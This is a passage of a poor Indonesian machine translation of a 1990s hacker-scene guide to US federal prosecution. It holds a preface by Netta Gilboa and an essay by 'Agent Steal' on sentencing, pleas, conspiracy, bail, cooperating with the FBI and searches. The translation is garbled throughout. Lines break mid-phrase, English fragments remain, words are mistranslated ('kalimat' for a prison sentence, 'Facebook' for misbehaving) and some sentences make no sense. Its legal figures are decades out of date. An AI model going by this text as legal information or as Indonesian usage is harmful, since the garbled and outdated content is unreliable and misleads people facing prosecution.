ruang lingkup penuh investigasi di muka, dan seiring berjalannya kasus lebih banyak terungkap, seringkali hanya di
menit terakhir. Selalu, hacker yang dimaksud disadap dan / atau diceritakan oleh seseorang sebelumnya
menggerebek yang menutupi serangan mereka sendiri atau meminimalkannya untuk turun dengan melibatkan orang lain. Sekali
satu
orang turun itu selalu mempengaruhi banyak orang lain nanti. Pengalaman saya sendiri berasal dari hidup dengan seorang
pensiunan
hacker ditangkap sepuluh bulan setelah dia berhenti melakukan peretasan karena kejahatan lama karena peretas yang lain
memberi tahu
dia sebagai imbalan karena melepaskan dirinya sendiri. Apa yang terjadi maka terjadilah. Ini makanan untuk berpikir bahwa
peretas yang Anda ejek hari ini akan dapat membuat kesepakatan untuk dirinya sendiri dengan memberi tahu Anda nanti. Dari
apa yang saya lihat
pada sistem peradilan pidana yang terkait dengan peretas, semakin sedikit musuh yang Anda pilih semakin baik
grup yang Anda ikuti dan orang yang Anda kenal dengan lebih baik juga. Ada banyak yang bisa dikatakan
dianggap seorang lamer dan tidak ada yang benar-benar memiliki sesuatu untuk Anda ketika FBI bertanya-tanya.
Ironisnya, saya bertemu Agen Mencuri, karena para peretas yang bersenang-senang memilih saya di Defcon. Saya memposting
pidato yang saya berikan di sana di halaman web Grey Areas (yang awalnya saya tidak ingin posting, tetapi memutuskan untuk
setelah itu benar-benar dicuri dari tangan saya sehingga saya tidak bisa menyelesaikannya) dan seseorang mengirim Agen
Mencuri salinan
sementara dia dipenjara. Dia menulis surat dukungan kepada saya, dan sementara beberapa peretas mengejek saya
tidak ada teman di komunitas dan tidak diinginkan, dan bahkan ada yang mengirim akun CompuServe kami
menyebabkan kami kehilangan akun dan email kami di sana, saya tertawa mengetahui bahwa artikel ini sedang dalam proses dan
bahwa dari semua publikasi itu bisa diberikan kepada yang pertama adalah Grey Are seperti yang dipilih.
Artikel ini menandai upaya penting pertama dalam kerja sama untuk memberi informasi kepada masyarakat secara keseluruhan
(bahkan kami
musuh individu) tentang cara terbaik untuk melindungi diri mereka sendiri. Saya tahu akan ada banyak lagi kasus peretas
peretas bekerja sama, bukannya saling serang dan membuatnya begitu mudah bagi pemerintah untuk memecah belah
mereka. Adalah kenyataan menyedihkan bahwa NAMBLA, deadhead, bintang film dewasa dan toko buku, pengguna ganja dan
lainnya

Halaman 58
kelompok menyimpang jauh lebih terorganisir daripada peretas yang mengaku sangat mahir, dan terlibat dengan,
mengumpulkan dan menggunakan informasi. Peretas hanyalah target termudah dari setiap subkultur kriminal. Sementara
Hackerz.org membuat T-shirt bagus (yang mereka tidak berikan gratis atau bahkan diskon untuk peretas di penjara, btw), mereka
tidak punya sumber daya untuk membantu peretas dalam kesulitan. Begitu pula EFF, yang kekurangan keinginan pengacara
untuk bekerja secara pro bono (gratis) di sebagian besar 50 negara bagian. Knight Lightning masih berutang uang pengacaranya.
Begitu juga
Bernie S. Ini bukan sesuatu yang hilang dari hidupmu saat kasus ini berakhir. 80% atau lebih dari
tahanan kehilangan kekasih dan / atau keluarga mereka setelah penangkapan. Meskipun ada beberapa pengecualian, ini memiliki
benar untuk lebih banyak peretas daripada yang saya pikirkan. FBI atau Secret Service kemungkinan akan mengunjungi kekasih
Anda
dan mencoba mengubahnya melawan Anda. Media arus utama akan berbohong tentang tuduhan Anda, fakta dari kasus Anda
dan hasilnya. Jika Anda beruntung, mereka akan ingat untuk menggunakan kata "diduga." Sementara kebanyakan peretas
mungkin
Saya pikir Emmanuel Goldstein dan 2600 akan membantu mereka, saya tahu banyak peretas yang dia abaikan
ketika dihubungi. Meskipun dia dipuji karena membantu Phiber Optik, nyatanya Phiber mendapat lebih banyak waktu penjara
pergi ke pengadilan atas saran Emmanuel daripada rekan terdakwa yang tidak memiliki Emmanuel membantu mereka dan
memohon
sebagai gantinya. Bernie S. patah rahangnya mungkin sebagian karena kemarahan pemerintah terhadap publikasi Emmanuel
dari kasus ini, dan terlepas dari semua perhatian Emmanuel telah mendapatkan Kevin Mitnick itu tidak menghentikan Mitnick
dimasukkan ke dalam sel isolasi atau mempercepat tanggal persidangannya. Satu hal yang jelas. Penjualan Emmanuel
2600 meningkat secara dramatis sebagai akibat dari menutupi kasus di atas hingga lebih dari 25.000 salinan per
isu. Ini memberikan jeda untuk berpikir, jika dia sangat peduli tentang peretas dan bukan penjualan dan ketenarannya sendiri,
mengapa dia tidak memiliki hubungan dengan dana pertahanan Hackerz.org atau mengapa dia belum memulai sesuatu yang
bermanfaat untuknya
sendiri. Phrack dan zine lainnya secara historis hanya mem-posting ulang laporan surat kabar yang salah yang dapat
menyebabkannya
peretas menutupi lebih banyak kerusakan. Sebagian besar teman peretas yang Anda ajak bicara setiap hari akan lari dari
Anda setelah penangkapan Anda dan akan memberi tahu orang lain segala macam cerita untuk menutupi fakta bahwa mereka
tidak tahu
benda. Ingat juga bahwa "teman" Anda adalah orang-orang yang paling mungkin membuat Anda ditangkap juga, seolah-olah
Anda
telepon tidak disadap sekarang mungkin milik mereka, dan jembatan suara populer dan panggilan konferensi yang Anda ajak
bicara
mereka pasti ada.
Mereka mengatakan informasi ingin gratis, dan ini hadiah untuk komunitas (juga berlaku untuk
siapapun yang dituduh melakukan kejahatan federal jika seseorang mengganti kejahatan lain dengan kata peretasan). Lain kali
kamu
letakkan seorang hacker di penjara dan tertawa tentang bagaimana mereka diperkosa ketika Anda berada di IRC, ingat itu
seseorang mungkin mencatat Anda dan jika Anda tetap aktif itu adalah taruhan yang bagus hari Anda akan datang juga. Kamu
tidak akan
tertawa saat itu, dan saya harap Anda akan memberi perhatian yang baik ketika Anda tiba-tiba berada di rumah tanpa jaminan
dan setiap kata terakhir yang Anda baca di sini ternyata benar. Kami yang telah ada di sana sebelum mengucapkan selamat
semoga sukses di muka. Ingatlah lain kali Anda meletakkannya di bawah ironisnya itu Anda harus mengubahnya
untuk saran harus d terjadi pada Anda. Pengacara Anda sepertinya tidak tahu apa-apa tentang kejahatan komputer dan
itu adalah kasus-kasus peretas yang ditangkap sebelum Anda yang, suka atau tidak, akan memberikan hukum
preseden untuk keyakinan Anda sendiri.
Netta "grayarea" Gilboa
PENGANTAR
Kemungkinan ditangkap karena peretasan komputer telah meningkat ke tingkat yang belum pernah terjadi sebelumnya. Tidak
penting
seberapa berhati-hati atau bijak Anda, Anda pasti akan membuat kesalahan. Dan faktanya adalah jika Anda memilikinya
mempercayai orang lain dengan pengetahuan tentang apa yang Anda terlibat, Anda telah membuat kesalahan pertama Anda.
Bagi siapa pun yang aktif dalam peretasan, saya tidak dapat mulai menekankan pentingnya informasi yang terkandung di
dalamnya
mengajukan. Bagi mereka yang baru saja ditangkap oleh FBI, membaca file ini bisa berarti perbedaan antara a
hukuman tiga tahun atau satu tahun. Bagi mereka yang belum pernah tertangkap, membaca file ini kemungkinan akan berubah
cara Anda meretas, atau menghentikan Anda dari meretas sama sekali.
Saya menyadari pernyataan saya sebelumnya agak tinggi, tetapi dalam 35 bulan saya menghabiskan waktu di penjara saya sudah
mendengar
banyak narapidana mengatakannya: "Jika saya tahu apa yang saya tahu sekarang." Saya ragu ada orang yang tidak setuju: The
sistem peradilan pidana adalah permainan yang harus dimainkan, baik oleh penuntutan dan pertahanan. Dan jika Anda harus
menjadi
pemain, Anda akan bijaksana untuk mempelajari aturan pertunangan. Penulis dan kontributor dari file ini miliki

Halaman 59
belajar dengan cara yang sulit. Sebagai hasilnya, kami mengarahkan keterampilan meretas kami selama masa penahanan kami
studi tentang hukum pidana dan, pada akhirnya, kelangsungan hidup. Setelah mengajukan mosi kami sendiri, menulis brief kami
sendiri dan
menjalani kehidupan di penjara, sekarang kami meneruskan pengetahuan ini kembali ke komunitas peretas. Belajar dari kami
pengalaman ... dan kesalahan kita.
Agen Mencuri
BAGIAN I - HUKUM KRIMINAL FEDERAL
A. GARIS BAWAH - PERILAKU YANG RELEVAN
Bagi Anda yang memiliki rentang perhatian G-phile pendek, saya akan membahas satu-satunya topik paling penting terlebih
dahulu.
Ini mungkin kesalahpahaman yang paling substansial dari sistem peradilan pidana saat ini. Subjek I
yang saya bicarakan disebut di lingkaran hukum sebagai "perilaku yang relevan." Agak rumit dan saya akan membahasnya.
Namun, saya harus membuatnya sejernih kristal sehingga akan menempel di kepala Anda. Itu bermuara pada dua konsep:
I. SEKALI ANDA DITEMUKAN GUILTY DARI BAHKAN SATU COUNT, SETIAP COUNT AKAN DIGUNAKAN
UNTUK MENGHITUNG KALIMAT ANDA
Terlepas dari apakah Anda mengajukan tawaran ke satu hitungan atau 100, hukuman Anda akan sama. Ini adalah
dengan asumsi kita berbicara tentang peretasan, penyalahgunaan kode, carding, pelanggaran komputer, pencurian properti, dll.
Semua
ini diperlakukan sama. Kejahatan lain yang Anda lakukan (tetapi tidak dituntut) juga akan digunakan untuk itu
hitung kalimat Anda. Anda tidak harus terbukti bersalah atas setiap tindakan. Selama itu muncul Anda
bertanggung jawab, atau seseorang mengatakan Anda, maka itu dapat digunakan untuk melawan Anda. Saya tahu ini terdengar
gila,
tapi itu benar; itu adalah keunggulan standar bukti untuk perilaku yang relevan. Praktek ini termasuk menggunakan
secara ilegal menyita barang bukti dan pembebasan sebagai informasi dalam menambah panjang hukuman Anda.
II KALIMAT ANDA AKAN BERDASARKAN KERUGIAN TOTAL MONETER
FBI menggunakan tabel hukuman untuk menghitung hukuman Anda. Itu mudah; Lebih Banyak Uang = Lebih Banyak Waktu.
Saya t
tidak masalah jika Anda mencoba untuk menembus 10 kali atau 10.000 kali. Masing-masing bisa menjadi hitungan tetapi itu
kerugiannya
itu penting. Dan upaya yang gagal diperlakukan sama dengan kejahatan yang selesai. Juga tidak masalah jika
Anda mencoba masuk ke komputer satu perusahaan atau 10. Pemerintah akan cukup menambahkan semua
Diperkirakan angka kerugian naik, dan kemudian merujuk ke tabel hukuman.
B. MEMPERSIAPKAN PERCOBAAN
Saya sudah berusaha terlalu menyederhanakan dengan penjelasan saya. Pedoman Hukuman Amerika Serikat
(USSG), sebenarnya cukup kompleks. Sedemikian rupa sehingga firma hukum khusus membentuk hanya berurusan dengan
hukuman. Jika Anda tertangkap, saya sangat merekomendasikan untuk mempekerjakan satu. Dalam beberapa kasus mungkin
bijaksana untuk menghindari
menyewa seorang pengacara persidangan dan langsung pergi ke salah satu dari "Spesialis Pasca Hukuman" ini. Simpan uang
Anda, mohon
keluar, lakukan waktumu. Ini mungkin terdengar agak keras, tetapi mengingat fakta bahwa Kantor Kejaksaan AS memiliki
tingkat keyakinan 95%, mungkin saran bijak. Namun, saya tidak ingin mengabaikan pentingnya siap
untuk postur percobaan. Jika Anda memiliki pengacara persidangan yang kuat, dan memiliki kasus yang kuat, itu akan jauh
menuju
negosiasi tawar-menawar pembelaan yang bagus.
C. PERJANJIAN PLEA DAN PENGACARA
Pengacara Anda bisa menjadi musuh terburuk Anda atau penasihat terbaik Anda. Menemukan yang tepat bisa menjadi tugas yang
sulit.
Biaya akan bervariasi dan biasanya pengacara meminta Anda berapa banyak uang tunai yang dapat Anda kumpulkan dan
kemudian berkata, "itu
jumlahnya akan baik-baik saja ". Pada kenyataannya permohonan dan hukuman yang sederhana seharusnya memberi Anda
sekitar $ 15.000. Biaya percobaan dapat
mudah melambung ke dalam kategori 6 angka. Dan akhirnya, seorang spesialis pasca hukuman akan mengenakan biaya $ 5.000
hingga $ 15.000 untuk
menangani presentasi hukuman Anda dengan argumen akhir.

Halaman 60
Namun, Anda dapat menemukan diri Anda di bawah kekuasaan Kantor Pembela Umum. Biasanya mereka tidak berharga,
sesekali Anda akan menemukan satu yang akan memperjuangkan Anda. Pada dasarnya ini adalah omong kosong. Yang bisa saya
katakan adalah jika Anda tidak
seperti yang Anda miliki, pecat mereka dan harap Anda diangkat menjadi yang lebih baik. Jika Anda dapat mengikis bersama $
5.000
untuk spesialis hukuman (pasca hukuman) untuk bekerja dengan pembela umum Anda, saya akan sangat merekomendasikannya.
Spesialis ini akan memastikan hakim melihat seluruh gambar dan akan berdebat dengan cara yang paling efektif
untuk kalimat yang ringan atau masuk akal. Jangan mengandalkan pembela umum Anda untuk menyajikan kasus Anda secara
menyeluruh.
Sidang hukuman Anda akan berkedip dengan sangat cepat sehingga Anda akan keluar dari ruang pengadilan dengan pusing.
Kamu dan kamu
tim pembela harus masuk ke persidangan yang telah dipersiapkan sepenuhnya, setelah mengajukan memorandum hukuman.
Perjanjian pembelaan yang Anda tandatangani akan memengaruhi Anda dan kasus Anda dengan baik setelah Anda dihukum.
Permohonan
perjanjian bisa menjadi bisnis yang rumit dan jika Anda tidak hati-hati atau berada dalam posisi pertahanan yang buruk (kasus ini
terhadap Anda kuat), persetujuan Anda mungkin mendapatkan yang terbaik dari Anda. Ada banyak masalah dalam permohonan
untuk bernegosiasi
lebih. Tetapi pada dasarnya saran saya adalah untuk menghindari penandatanganan hak Anda untuk mengajukan banding. Setelah
Anda mendapatkan nyata
penjara dengan pengacara penjara nyata Anda akan mengetahui seberapa buruk Anda telah kacau. Meskipun demikian masalah
itu,
Anda kemungkinan besar akan ingin mengajukan banding. Karena itu, Anda perlu mengingat dua hal: bawa semuanya
masalah Anda yang dapat diajukan banding saat menjatuhkan hukuman dan mengajukan pemberitahuan banding dalam waktu 10
hari sejak hukuman Anda.
Tunda dan kendur.
Namun saya harus menyebutkan bahwa Anda dapat mengajukan banding atas beberapa masalah meskipun Anda telah
menandatangani hak Anda untuk
menarik. Misalnya, Anda tidak dapat membatalkan hak Anda untuk mengajukan banding atas hukuman ilegal. Jika hakim
memerintahkan
sesuatu yang tidak diizinkan oleh undang-undang, Anda kemudian memiliki hak konstitusional untuk mengajukan banding atas
hukuman Anda.
Saya akan menutup bagian ini dengan lelucon penjara. T: Bagaimana Anda bisa tahu kapan pengacara Anda berbohong? A: Anda
bisa lihat
bibirnya bergerak.
D. KONSPIRASI
Apa yang terjadi dengan alasan teknis? Saya minta maaf untuk mengatakan hari-hari itu hilang, hanya tersisa untuk
film. Pengadilan pada umumnya menolak banyak argumen sebagai "kesalahan tidak berbahaya" atau "pemerintah bertindak baik
Iman ". Tren yang paling mengkhawatirkan, dan tentu saja akar keberhasilan penuntutan, adalah kata-kata yang bebas
hukum konspirasi. Sederhananya, jika dua orang atau lebih berencana untuk melakukan sesuatu yang ilegal, maka salah satunya
melakukannya
sesuatu yang lebih jauh dari tujuan (bahkan sesuatu yang legal), maka itu adalah kejahatan. Ya itu benar. Di Amerika
itu ilegal untuk hanya berbicara tentang melakukan kejahatan. Paging Pak Orwell. Halo?
Inilah contoh hipotetis untuk memperjelas hal ini. Bill G. dan Marc A. adalah peretas (dapat Anda bayangkan?) Bill dan
Marc sedang berbicara di telepon dan tanpa sepengetahuan mereka, FBI merekam panggilan itu. Mereka berbicara tentang
meretas ke mainframe Apple dan menghapus prototipe Browser Web Apple baru. Setelah hari itu,
Marc melakukan riset yang sah untuk mengetahui tipe mainframe dan sistem operasi apa yang digunakan Apple.
Keesokan paginya, FBI menggerebek rumah Marc dan merebut semua yang memiliki kabel. Bill dan Marc pergi ke pengadilan
dan menghabiskan jutaan untuk membela diri. Mereka berdua dinyatakan bersalah atas konspirasi untuk melakukan yang tidak
sah
akses ke sistem komputer.
E. PENGIRIMAN
Pada titik ini terserah departemen masa percobaan untuk menyiapkan laporan untuk pengadilan. Ini adalah tanggung jawab
mereka
menghitung kerugian dan mengidentifikasi keadaan yang memberatkan atau meringankan. Apple Computer Corporation
memperkirakan bahwa jika Bill dan M arc akan berhasil maka akan menghasilkan kerugian sebesar $ 2 juta.
Ini adalah angka yang akan digunakan pengadilan. Berdasarkan skenario dasar ini, duo dinamis kami akan menerima kurang
lebih
hukuman tiga tahun.
Seperti yang saya sebutkan, hukuman itu kompleks dan banyak faktor yang dapat mengurangi atau menambah kalimat, biasanya
terakhir. Katakanlah FBI juga menemukan file di komputer Marc dengan 50.000 nomor akun tidak sah
dan kata sandi untuk Jaringan Microsoft. Bahkan jika FBI tidak menuntutnya dengan ini, itu bisa digunakan untuk itu
tingkatkan hukumannya. Secara umum pemerintah menempatkan $ 200-per-akun upaya kerugian pada hal-hal ini

Halaman 61
sifat (yaitu nomor kartu kredit dan kata sandi = perangkat akses). Ini menghasilkan kerugian $ 10 juta. Digabungkan
dengan $ 2 juta dari Apple, Marc akan pergi selama sekitar sembilan tahun. Untungnya ada Federal
Penjara tidak jauh dari Redmond, WA agar Bill bisa mengunjunginya.
Beberapa faktor lain yang akan digunakan dalam perhitungan kalimat mungkin termasuk yang berikut: masa lalu
catatan kriminal, seberapa besar peran Anda dalam pelanggaran itu, cacat mental, baik Anda sedang atau tidak
masa percobaan pada saat pelanggaran, jika ada senjata yang digunakan, jika ada ancaman yang digunakan, jika nama Anda
Kevin Mitnick (heh), jika orang tua menjadi korban, jika Anda memanfaatkan pekerjaan Anda
posisi, jika Anda sangat terlatih dan menggunakan keahlian khusus Anda, jika Anda bekerja sama dengan pihak berwenang, jika
Anda
tunjukkan penyesalan, jika Anda pergi ke pengadilan, dll.
Ini hanyalah beberapa dari banyak faktor yang dapat menambah atau mengurangi hukuman. Itu akan
di luar ruang lingkup artikel ini untuk membahas USSG secara lengkap. Saya merasa bahwa saya telah melompati
beberapa masalah penting. Bagaimanapun, jika Anda ingat dua poin utama saya selain bagaimana
hukum konspirasi berhasil, Anda akan jauh di depan dalam melindungi diri Anda sendiri.
F. PENGGUNAAN KETERAMPILAN KHUSUS
Satu-satunya "peningkatan hukuman" khusus yang ingin saya bahas adalah yang menjadi tanggung jawab saya
pengaturan preseden dengan. Di AS v Petersen, 98 F.3d. 502, 9th Cir., Pengadilan Banding Amerika Serikat diadakan
bahwa beberapa peretas komputer mungkin memenuhi syarat untuk peningkatan keterampilan khusus. Apa ini umumnya berarti
adalah 6
sampai 24 bulan peningkatan dalam kalimat. Dalam kasus saya, hukuman itu menambah delapan bulan hukuman 33 bulan saya
41 bulan. Pada dasarnya pengadilan menyatakan bahwa karena saya menggunakan keterampilan peretasan "canggih" saya
terhadap a
sah sebagai konsultan keamanan komputer, maka peningkatan tersebut berlaku. Sungguh ironis jika saya melakukannya
tetap menjadi hacker kriminal maka saya akan melayani lebih sedikit waktu.
Moral dari cerita ini adalah bahwa pemerintah akan menemukan cara untuk memberi Anda waktu sebanyak yang mereka
inginkan. Itu
USSG mulai berlaku pada tahun 1987 dalam upaya untuk menghapus perbedaan dalam hukuman. Terdakwa dengan hal serupa
kejahatan dan latar belakang serupa sering menerima hukuman yang berbeda. Sayangnya, latihan ini masih
berlanjut. USSG memang gagal.
G. MENDAPATKAN BAIL
Di masa lalu, FBI mungkin hanya melakukan serangan mereka dan kemudian pergi tanpa menangkapmu. Sekarang ini
Metode akan menjadi pengecualian daripada aturan dan kemungkinan besar Anda akan ditahan
saat penggerebekan. Peluangnya juga bagus sehingga Anda tidak akan dibebaskan dengan jaminan. Ini adalah bagian dari
rencana pemerintah untuk menghancurkan Anda dan memenangkan kasus mereka. Jika mereka dapat menemukan alasan untuk
menolak jaminan Anda
akan. Agar memenuhi syarat untuk mendapat jaminan, Anda harus memenuhi kriteria berikut:
- Anda harus menjadi penduduk di yurisdiksi tempat Anda ditangkap.
- Anda harus dipekerjakan dengan menguntungkan atau memiliki ikatan keluarga dengan daerah tersebut.
- Anda tidak dapat memiliki riwayat kegagalan untuk muncul atau melarikan diri.
- Anda tidak dapat dianggap sebagai bahaya atau ancaman bagi komunitas.
Selain itu, jaminan Anda dapat ditolak karena alasan berikut:
- Seseorang maju dan menyatakan ke pengadilan bahwa Anda mengatakan Anda akan melarikan diri jika dibebaskan.
- Hukuman Anda akan panjang jika terbukti bersalah.
- Anda memiliki riwayat kriminal sebelumnya.

Halaman 62
- Anda memiliki tagihan yang tertunda di yurisdiksi lain.
Apa hasil dari semua "reformasi jaminan" ini adalah bahwa hanya sekitar 20% dari orang yang ditangkap membuat jaminan.
Selain itu
dibutuhkan 1-3 minggu untuk memproses surat jaminan Anda ketika properti terlibat dalam mengamankan ikatan Anda.
Sekarang Anda berada di penjara, lebih khusus Anda berada di fasilitas memegang administrasi atau penjara daerah itu
memiliki kontrak dengan FBI untuk menahan tahanan mereka. Berdoalah agar Anda berada di kota yang cukup besar untuk
membenarkannya
memiliki Pusat Penahanan Federal. Penjara kabupaten biasanya adalah tempat terakhir yang Anda inginkan.
H. STATE VS. BIAYA FEDERAL
Dalam beberapa kasus Anda akan menghadapi dakwaan negara bagian dengan kemungkinan FBI "mengambilnya". Kamu boleh
bahkan bisa mendorong FBI untuk mendakwa Anda. Ini adalah keputusan yang sulit. Dengan keadaan yang akan Anda lakukan
jauh lebih sedikit waktu, tetapi akan menghadapi kerumunan yang lebih ketat dan kondisi di penjara. Penjara Federal yang
Diberikan bisa
menjadi keras juga, tetapi umumnya sebagai penjahat kerah putih tanpa kekerasan Anda akhirnya akan ditempatkan ke dalam
lingkungan dengan tahanan keamanan rendah lainnya. Lebih lanjut tentang ini nanti.
Sampai Anda dijatuhi hukuman, Anda akan tetap sebagai "narapidana praperadilan" dalam populasi umum dengan narapidana
lainnya.
Beberapa narapidana lainnya akan menjadi pemangsa tetapi FBI tidak mentolerir omong kosong. Jika seseorang bertindak
Facebook, mereka akan dilempar ke dalam lubang. Jika mereka terus mengancam populasi narapidana, mereka akan ditinggalkan
dalam segregasi (lubang). Kadang-kadang narapidana yang berisiko atau terancam akan ditempatkan di
pemisahan. Ini bukan untuk melindungi narapidana. Ini untuk melindungi penjara dari gugatan jika
narapidana terluka.
I. KERJASAMA
Secara alami ketika Anda pertama kali ditangkap, jas akan ingin berbicara dengan Anda. Pertama di tempat tinggal Anda dan,
jika Anda
tampaknya banyak bicara, mereka akan membawa Anda kembali ke kantor mereka untuk mengobrol panjang dan secangkir kopi.
Saya
saran pada saat ini sudah dicoba dan benar dan kita semua pernah mendengarnya sebelumnya: tetap diam dan minta untuk
berbicara dengan seorang
pengacara. Terlepas dari apa situasinya, atau bagaimana Anda berencana untuk melanjutkan, tidak ada yang dapat Anda katakan
itu
akan membantumu. Tidak ada. Bahkan jika Anda tahu bahwa Anda akan bekerja sama, ini bukan waktunya.
Ini jelas merupakan subjek yang kontroversial, tetapi faktanya sekitar 80% dari semua terdakwa
akhirnya mengakui dan melibatkan orang lain. Tren ini berasal dari kalimat FBI yang sangat panjang
membagikan hari ini. Tidak banyak orang yang ingin melakukan 10 hingga 20 tahun untuk menyelamatkan teman mereka saat
mereka
bisa dilakukan 3 hingga 5. Ini adalah keputusan yang harus diambil setiap individu. Satu-satunya saran saya adalah menabung
teman dekat dan keluarga Anda. Orang lain adalah permainan yang adil. Dalam sistem penjara, orang kulit hitam memiliki
perkataan
"Turun dulu." Bukan rahasia lagi bahwa terdakwa pertama dalam konspirasi biasanya akan mendapatkan yang terbaik
berurusan. Saya bahkan telah melihat situasi di mana ikan besar menyerahkan semua ikan kecilnya dan menerima 40% dari
hukumannya.
Kebetulan, sedang ditanyai atau diinterogasi oleh FBI bisa menjadi cobaan tersendiri. Saya akan sangat
merekomendasikan membaca tentang teknik interogasi sebelumnya. Setelah Anda mengetahui metode mereka, itu akan menjadi
semua cukup transparan untuk Anda dan pembekalan berjalan jauh lebih lancar.
Ketika Anda membuat kesepakatan dengan pemerintah, Anda membuat kesepakatan dengan iblis itu sendiri. Jika Anda
membuatnya
kesalahan mereka akan mengingkari kesepakatan dan Anda tidak akan mendapatkan apa-apa. Pada beberapa kesempatan
pemerintah akan menipu
Anda berpikir mereka ingin Anda bekerja sama ketika mereka tidak benar-benar tertarik pada apa pun yang Anda harus lakukan
mengatakan. Mereka hanya ingin Anda mengaku bersalah. Saat Anda menandatangani perjanjian kerja sama, tidak ada ketentuan
menjanjikan berapa banyak pengurangan kalimat yang akan Anda terima. Itu harus diputuskan setelah Anda
kesaksian, dll. dan pada saat hukuman. Sepenuhnya terserah hakim. Namun, penuntutan membuat
rekomendasi dan hakim biasanya sejalan dengannya. Padahal, kalau penuntut tidak bergerak
pengadilan untuk "keberangkatan ke bawah" tangan pengadilan Anda terikat dan Anda tidak mendapatkan istirahat.

Halaman 63
Seperti yang Anda lihat, bekerja sama adalah bisnis yang sulit. Kebanyakan orang, terutama mereka yang tidak pernah
menghabiskan uang
hari di penjara, akan memberitahu Anda untuk tidak bekerja sama. "Jangan mengadu." Ini adalah sikap mulia yang harus diambil.
Namun, dalam beberapa hal
situasi itu sangat bodoh. Menyelamatkan seseorang yang dengan mudah akan melakukan hal yang sama kepada Anda adalah
panggilan yang sulit.
Itu adalah sesuatu yang perlu pertimbangan cermat. Seperti yang saya katakan, selamatkan teman Anda kemudian lakukan apa
yang harus Anda lakukan
untuk keluar dari penjara dan melanjutkan hidup Anda.
Saya senang mengatakan bahwa saya bisa menghindari melibatkan teman baik saya dan mantan majikan dalam jumlah besar
investigasi yang mengelilingi kasus saya. Itu tidak mudah. Saya harus berjalan di garis yang bagus. Banyak dari Anda mungkin
tahu
bahwa saya (Agen Mencuri) pergi bekerja untuk FBI setelah saya ditangkap. Saya bertanggung jawab untuk mengajar beberapa
agen tentang peretasan dan budaya. Apa yang banyak dari Anda tidak tahu adalah bahwa saya memiliki hubungan FBI dekat
sebelum saya
menangkap. Saya terlibat dalam peretasan selama lebih dari 15 tahun dan telah bekerja sebagai konsultan keamanan yang tepat.
Bahwa
Itulah sebabnya saya diberi kesempatan itu. Namun tidak mungkin, bahwa kita akan melihat lebih banyak dari jenis ini
pengaturan di masa depan. Hubungan kami berjalan buruk, sebagian besar karena kelalaian pasif dan kurangnya mereka
pengalaman dalam berurusan dengan peretas. Pemerintah pada umumnya sekarang memiliki sumber daya, pengalaman, dan
agen yang menyamar dalam komunitas. Mereka tidak lagi membutuhkan peretas untuk menunjukkan kepada mereka tali atau
yang terbaru
lubang keamanan.
Namun demikian, jika Anda berada dalam posisi untuk memberi tahu FBI sesuatu yang mereka tidak tahu dan membantu mereka
membangun
kasus terhadap seseorang, Anda mungkin memenuhi syarat untuk pengurangan hukuman. Kisaran tipikal adalah 20% hingga
70%. Biasanya
sekitar 35% hingga 50%. Kadang-kadang Anda mungkin menemukan diri Anda pada akhir rantai makanan jaksa dan
Pemerintah tidak akan membiarkan Anda bekerja sama. Kevin Mitnick akan menjadi contoh yang baik untuk ini. Bahkan jika dia
mau
berguling, saya ragu itu akan membuatnya banyak. Dia terlalu besar ikan, terlalu banyak media. Saran terakhir saya dalam hal ini
Masalahnya adalah mendapatkan kesepakatan secara tertulis sebelum Anda mulai bekerja sama.
FBI juga menyukainya ketika Anda "berterus terang" dan menerima tanggung jawab. Ada ketentuan dalam
Pedoman Hukuman, 3E1.1, yang mengetuk sedikit waktu istirahat jika Anda mengakui kejahatan Anda, mengaku bersalah dan
menunjukkan penyesalan. Jika Anda pergi ke pengadilan, biasanya Anda tidak akan memenuhi syarat untuk "penerimaan
tanggung jawab" dan
kalimat Anda akan lebih panjang.
J. MASIH BERPIKIR TENTANG COBA
Banyak peretas mungkin ingat kasus Craig Neidorf atas dokumen 911 Sistem Operasi yang terkenal.
Craig memenangkan kasusnya ketika ditemukan bahwa manual yang dimaksud, bahwa dia telah menerbitkan di Phrack
majalah, bukan milik seperti yang diklaim tetapi tersedia untuk umum dari AT&T. Itu adalah telur di wajah untuk hari itu
Dinas Rahasia.
Jangan disesatkan oleh ini. Pemerintah belajar banyak dari kegagalan ini dan bahkan dengan dukungan yang terpuji
dari EFF, Craig dengan tipis menggagalkan sebuah hukuman. Bagaimanapun, itu adalah pengalaman yang mencoba (tidak ada
permainan kata-kata
dimaksudkan) untuknya dan pengacaranya. Poin yang ingin saya sampaikan adalah sulit untuk mengalahkan FBI. Mereka
bermain kotor dan akan melakukan apa saja, termasuk berbohong, untuk memenangkan kasus mereka. Jika Anda ingin benar-
benar menang, Anda perlu
untuk mengetahui bagaimana mereka membangun kasing.
K. PENCARIAN DAN PENCARIAN
Ada sebuah dokumen berjudul "Pedoman Federal Untuk Mencari Dan Merebut Komputer." Pertama kali datang ke saya
perhatian ketika diterbitkan dalam edisi 12-21-94 dari Pelapor Hukum Pidana oleh Biro
Urusan Nasional (Sebutkan 56 CRL 2023). Ini adalah kumpulan tips, kasus, kesalahan yang menarik dan, secara umum,
cara menangkap peretas komputer. Dianjurkan membaca.
Pencarian dan penyitaan adalah yurisprudensi yang terus berkembang. Apa yang tidak diizinkan hari ini dapat melalui beberapa
logika Mahkamah Agung yang berbelit-belit, diizinkan dan sah besok. Sekali lagi, perawatan lengkap ini
subjek berada di luar cakupan makalah ini. Tetapi cukuplah untuk mengatakan jika agen Federal ingin masuk
kamar Anda dan raih semua peralatan komputer Anda tanpa surat perintah yang bisa ia lakukan dengan hanya mengatakan
dia memiliki kemungkinan penyebab (PC). PC adalah sesuatu yang memberinya firasat bahwa Anda sedang melakukan

Halaman 64
kejahatan. Polisi telah diketahui menemukan PC untuk mencari mobil ketika bagasi duduk terlalu rendah ke tanah atau
balok tinggi selalu menyala.
L. SURVEILLANCE DAN WIRETAPS
Untungnya FBI masih harus menunjukkan sedikit pengekangan saat memegang kabel mereka. Itu membutuhkan perintah
pengadilan
dan mereka harus menunjukkan bahwa tidak ada cara lain untuk mendapatkan informasi yang mereka cari, pilihan terakhir jika
Anda mau.
Wiretaps juga mahal untuk dioperasikan. Mereka harus menyewa saluran dari perusahaan telepon, membayar agen
pantau 24 jam sehari dan kemudian salin. Jika kita berbicara tentang ketukan data, ada biaya tambahan.
Peralatan intersepsi / terjemahan yang mahal harus tersedia untuk menegosiasikan berbagai kecepatan modem. Kemudian
data harus disimpan, diuraikan, didekompresi, diformat, di protokol, dll. Ini adalah tugas yang menakutkan dan
biasanya disediakan hanya untuk kasus profil tertinggi. Jika FBI dapat mengambil data dari yang lain, maka silakan, suka
